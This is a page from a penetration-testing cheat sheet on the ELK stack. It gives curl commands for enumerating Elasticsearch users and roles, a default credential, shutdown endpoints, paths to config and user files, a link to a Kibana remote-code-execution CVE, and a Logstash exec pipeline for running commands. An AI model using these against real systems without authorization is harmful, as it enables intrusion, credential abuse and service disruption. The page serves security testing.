Pentest Book
Search…
ELK

Elasticsearch

Enum

1
# Check status:
2
curl -X GET "ELASTICSEARCH-SERVER:9200/"
3
4
# Check Auth enabled:
5
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
6
7
# Users:
8
elastic:changeme
9
kibana_system
10
logstash_system
11
beats_system
12
apm_system
13
remote_monitoring_user
14
15
# Other endpoints
16
/_cluster/health
17
/_cat/indices
18
/_cat/health
19
20
# Interesting endpoints (BE CAREFUL)
21
/_shutdown
22
/_cluster/nodes/_master/_shutdown
23
/_cluster/nodes/_shutdown
24
/_cluster/nodes/_all/_shutdown
Copied!

With creds

1
# Using the API key:
2
curl -H "Authorization: ApiKey <API-KEY>" ELASTICSEARCH-SERVER:9200/
3
4
# Get more information about the rights of an user:
5
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
6
7
# List all users on the system:
8
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
9
10
# List all roles on the system:
11
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role
Copied!

Internal config files

1
Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml
2
Kibana configuration: /etc/kibana/kibana.yml
3
Logstash configuration: /etc/logstash/logstash.yml
4
Filebeat configuration: /etc/filebeat/filebeat.yml
5
Users file: /etc/elasticsearch/users_roles
Copied!

Kibana

Basic

1
# Port: 5601
2
# Config file && users: /etc/kibana/kibana.yml
3
# Try also with use kibana_system
4
# Version < 6.6.0 = RCE (https://github.com/LandGrey/CVE-2019-7609/)
Copied!

Logstash

Basic

1
# Pipelines config: /etc/logstash/pipelines.yml
2
# Check pipelines with this property: "config.reload.automatic: true"
3
# If file wildcard is specified:
4
###################
5
input {
6
exec {
7
command => "whoami"
8
interval => 120
9
}
10
}
11
12
output {
13
file {
14
path => "/tmp/output.log"
15
codec => rubydebug
16
}
17
}
18
####################
Copied!
Last modified 9mo ago